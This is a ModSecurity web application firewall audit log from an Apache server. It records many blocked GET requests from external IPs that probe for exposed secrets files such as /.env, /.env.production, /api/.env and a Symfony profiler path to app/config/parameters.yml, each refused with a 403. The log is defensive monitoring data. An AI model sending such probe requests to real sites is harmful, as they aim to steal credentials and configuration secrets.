Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745132654757702 872 (- - -)
Stopwatch2: 1745132654757702 872; combined=343, p1=280, p2=0, p3=0, p4=0, p5=62, sr=73, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0a1c4943-Z--
--446f8163-A--
[20/Apr/2025:14:04:15 +0700] aAScb8TCDeBrh52UaHRfKQAAAJQ 103.236.140.4 43870 103.236.140.4 8181
--446f8163-B--
GET /.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 78.153.140.222
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 78.153.140.222
X-Forwarded-Proto: http
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Linux; Android 7.1.1; Moto E (4) Build/NCQ26.69-56) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36
--446f8163-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--446f8163-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745132655294642 792 (- - -)
Stopwatch2: 1745132655294642 792; combined=293, p1=254, p2=0, p3=0, p4=0, p5=39, sr=71, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--446f8163-Z--
--a97e522f-A--
[20/Apr/2025:14:04:18 +0700] aAScclTf0pL9EQC7JDWtbQAAAFc 103.236.140.4 43886 103.236.140.4 8181
--a97e522f-B--
GET /.env.example HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 78.153.140.222
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 78.153.140.222
X-Forwarded-Proto: http
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; N9510 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
--a97e522f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a97e522f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745132658063138 836 (- - -)
Stopwatch2: 1745132658063138 836; combined=340, p1=300, p2=0, p3=0, p4=0, p5=40, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a97e522f-Z--
--5711ad49-A--
[20/Apr/2025:14:04:20 +0700] aAScdEAzeWrUIk0gvAu-sAAAANA 103.236.140.4 43900 103.236.140.4 8181
--5711ad49-B--
GET /.env.production HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 78.153.140.222
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 78.153.140.222
X-Forwarded-Proto: http
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-gb; SM-T310 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
--5711ad49-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5711ad49-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745132660173736 847 (- - -)
Stopwatch2: 1745132660173736 847; combined=362, p1=262, p2=0, p3=0, p4=0, p5=100, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5711ad49-Z--
--aa342c22-A--
[20/Apr/2025:14:04:22 +0700] aAScdlTf0pL9EQC7JDWtbgAAAEo 103.236.140.4 43910 103.236.140.4 8181
--aa342c22-B--
GET /admin/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 78.153.140.222
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 78.153.140.222
X-Forwarded-Proto: http
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.1.1 (KHTML, like Gecko) Safari/312
--aa342c22-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--aa342c22-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745132662122923 851 (- - -)
Stopwatch2: 1745132662122923 851; combined=288, p1=248, p2=0, p3=0, p4=0, p5=40, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--aa342c22-Z--
--1fffb631-A--
[20/Apr/2025:14:04:23 +0700] aAScd1u16wJWB6g0mU-b6AAAABY 103.236.140.4 43912 103.236.140.4 8181
--1fffb631-B--
GET /api/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 78.153.140.222
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 78.153.140.222
X-Forwarded-Proto: http
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Linux; Android 4.4.3; KFAPWI Build/KTU84M) AppleWebKit/537.36 (KHTML, like Gecko) Silk/44.1.81 like Chrome/44.0.2403.128 Safari/537.36
--1fffb631-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1fffb631-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745132663045783 777 (- - -)
Stopwatch2: 1745132663045783 777; combined=312, p1=277, p2=0, p3=0, p4=0, p5=35, sr=111, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1fffb631-Z--
--7f09106a-A--
[20/Apr/2025:14:04:25 +0700] aASceUAzeWrUIk0gvAu-sQAAANU 103.236.140.4 43922 103.236.140.4 8181
--7f09106a-B--
GET /app/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 78.153.140.222
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 78.153.140.222
X-Forwarded-Proto: http
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.52 (KHTML, like Gecko) Version/9.0 Safari/601.1.52
--7f09106a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7f09106a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745132665026221 803 (- - -)
Stopwatch2: 1745132665026221 803; combined=311, p1=271, p2=0, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7f09106a-Z--
--2d70ff12-A--
[20/Apr/2025:14:04:25 +0700] aASceVu16wJWB6g0mU-b6gAAAAI 103.236.140.4 43928 103.236.140.4 8181
--2d70ff12-B--
GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 78.153.140.222
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 78.153.140.222
X-Forwarded-Proto: http
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-gb; SAMSUNG SM-G7102 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
--2d70ff12-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2d70ff12-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745132665729081 855 (- - -)
Stopwatch2: 1745132665729081 855; combined=336, p1=298, p2=0, p3=0, p4=0, p5=37, sr=74, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2d70ff12-Z--
--001a6c43-A--
[20/Apr/2025:14:04:26 +0700] aAScelu16wJWB6g0mU-b7QAAABE 103.236.140.4 43936 103.236.140.4 8181
--001a6c43-B--
GET /backend/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 78.153.140.222
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 78.153.140.222
X-Forwarded-Proto: http
Connection: close
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
--001a6c43-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--001a6c43-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745132666967294 783 (- - -)
Stopwatch2: 1745132666967294 783; combined=322, p1=290, p2=0, p3=0, p4=0, p5=32, sr=119, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--001a6c43-Z--
--b7d1654e-A--
[20/Apr/2025:14:04:27 +0700] aASce0AzeWrUIk0gvAu-sgAAAME 103.236.140.4 43942 103.236.140.4 8181
--b7d1654e-B--
GET /core/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 78.153.140.222
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 78.153.140.222
X-Forwarded-Proto: http
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.5.1 (KHTML, like Gecko) Safari/312.3.1
--b7d1654e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b7d1654e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745132667483317 820 (- - -)
Stopwatch2: 1745132667483317 820; combined=312, p1=269, p2=0, p3=0, p4=0, p5=42, sr=77, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b7d1654e-Z--
--0f4dc853-A--
[20/Apr/2025:14:04:29 +0700] aAScfUAzeWrUIk0gvAu-swAAANM 103.236.140.4 43950 103.236.140.4 8181
--0f4dc853-B--
GET /crm/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 78.153.140.222
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 78.153.140.222
X-Forwarded-Proto: http
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Linux; U; Android 6.0; TECNO W2 Build/MRA58K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.98 Mobile Safari/537.36 OPR/19.0.2254.108926
--0f4dc853-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0f4dc853-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745132669299018 817 (- - -)
Stopwatch2: 1745132669299018 817; combined=335, p1=294, p2=0, p3=0, p4=0, p5=40, sr=102, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0f4dc853-Z--
--b9f6cb17-A--
[20/Apr/2025:14:04:30 +0700] aAScflTf0pL9EQC7JDWtcQAAAEA 103.236.140.4 43956 103.236.140.4 8181
--b9f6cb17-B--
GET /demo/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 78.153.140.222
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 78.153.140.222
X-Forwarded-Proto: http
Connection: close
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB7.4; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727; AskTbORJ/5.15.15.36191)
--b9f6cb17-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b9f6cb17-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745132670044999 793 (- - -)
Stopwatch2: 1745132670044999 793; combined=310, p1=272, p2=0, p3=0, p4=0, p5=37, sr=88, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b9f6cb17-Z--
--0df17033-A--
[20/Apr/2025:14:04:34 +0700] aAScgsTCDeBrh52UaHRfMgAAAI0 103.236.140.4 43980 103.236.140.4 8181
--0df17033-B--
GET /vendor/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 78.153.140.222
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 78.153.140.222
X-Forwarded-Proto: http
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/416.12 (KHTML, like Gecko) Safari/416.13_Adobe
--0df17033-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0df17033-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745132674216370 833 (- - -)
Stopwatch2: 1745132674216370 833; combined=353, p1=318, p2=0, p3=0, p4=0, p5=34, sr=125, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0df17033-Z--
--121ed830-A--
[20/Apr/2025:14:06:17 +0700] aASc6VTf0pL9EQC7JDWuNAAAAE0 103.236.140.4 45784 103.236.140.4 8181
--121ed830-B--
GET /.env_1 HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.72.19
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.72.19
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36
Accept-Charset: utf-8
--121ed830-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--121ed830-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745132777123455 793 (- - -)
Stopwatch2: 1745132777123455 793; combined=317, p1=264, p2=0, p3=0, p4=0, p5=53, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--121ed830-Z--
--afc0eb2e-A--
[20/Apr/2025:14:53:09 +0700] aASn5Vu16wJWB6g0mU-nKAAAABU 103.236.140.4 44222 103.236.140.4 8181
--afc0eb2e-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 161.35.36.26
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 161.35.36.26
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--afc0eb2e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--afc0eb2e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745135589668886 778 (- - -)
Stopwatch2: 1745135589668886 778; combined=345, p1=311, p2=0, p3=0, p4=0, p5=34, sr=105, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--afc0eb2e-Z--
--544b3f4d-A--
[20/Apr/2025:16:36:37 +0700] aATAJUAzeWrUIk0gvAvP_AAAAMI 103.236.140.4 39970 103.236.140.4 8181
--544b3f4d-B--
GET /.env HTTP/1.0
Host: mignere.twilightparadox.com
X-Real-IP: 138.68.82.23
X-Forwarded-Host: mignere.twilightparadox.com
X-Forwarded-Server: mignere.twilightparadox.com
X-Forwarded-For: 138.68.82.23
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--544b3f4d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--544b3f4d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745141797529608 830 (- - -)
Stopwatch2: 1745141797529608 830; combined=322, p1=288, p2=0, p3=0, p4=0, p5=34, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--544b3f4d-Z--
--95908606-A--
[20/Apr/2025:17:29:46 +0700] aATMmkAzeWrUIk0gvAvhpgAAAMc 103.236.140.4 52462 103.236.140.4 8181
--95908606-B--
GET /.env HTTP/1.0
Host: vinic.twilightparadox.com
X-Real-IP: 146.190.63.48
X-Forwarded-Host: vinic.twilightparadox.com
X-Forwarded-Server: vinic.twilightparadox.com
X-Forwarded-For: 146.190.63.48
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--95908606-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--95908606-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745144986632321 815 (- - -)
Stopwatch2: 1745144986632321 815; combined=310, p1=271, p2=0, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--95908606-Z--
--45ca4932-A--
[20/Apr/2025:18:29:38 +0700] aATaokAzeWrUIk0gvAsoagAAANI 103.236.140.4 53730 103.236.140.4 8181
--45ca4932-B--
GET /.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 196.251.69.35
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 196.251.69.35
X-Forwarded-Proto: http
Connection: close
Accept: */*
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
--45ca4932-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--45ca4932-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745148578049970 944 (- - -)
Stopwatch2: 1745148578049970 944; combined=328, p1=290, p2=0, p3=0, p4=0, p5=38, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--45ca4932-Z--
--e9167a35-A--
[20/Apr/2025:19:03:24 +0700] aATijEAzeWrUIk0gvAsqrQAAAM0 103.236.140.4 33366 103.236.140.4 8181
--e9167a35-B--
GET /.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 45.148.10.172
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 45.148.10.172
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1
Accept-Charset: utf-8
--e9167a35-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e9167a35-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745150604083409 915 (- - -)
Stopwatch2: 1745150604083409 915; combined=342, p1=300, p2=0, p3=0, p4=0, p5=42, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e9167a35-Z--
--bd910574-A--
[20/Apr/2025:19:23:57 +0700] aATnXUAzeWrUIk0gvAsrxQAAANM 103.236.140.4 38038 103.236.140.4 8181
--bd910574-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.72.19
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.72.19
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5
Accept-Charset: utf-8
--bd910574-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--bd910574-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
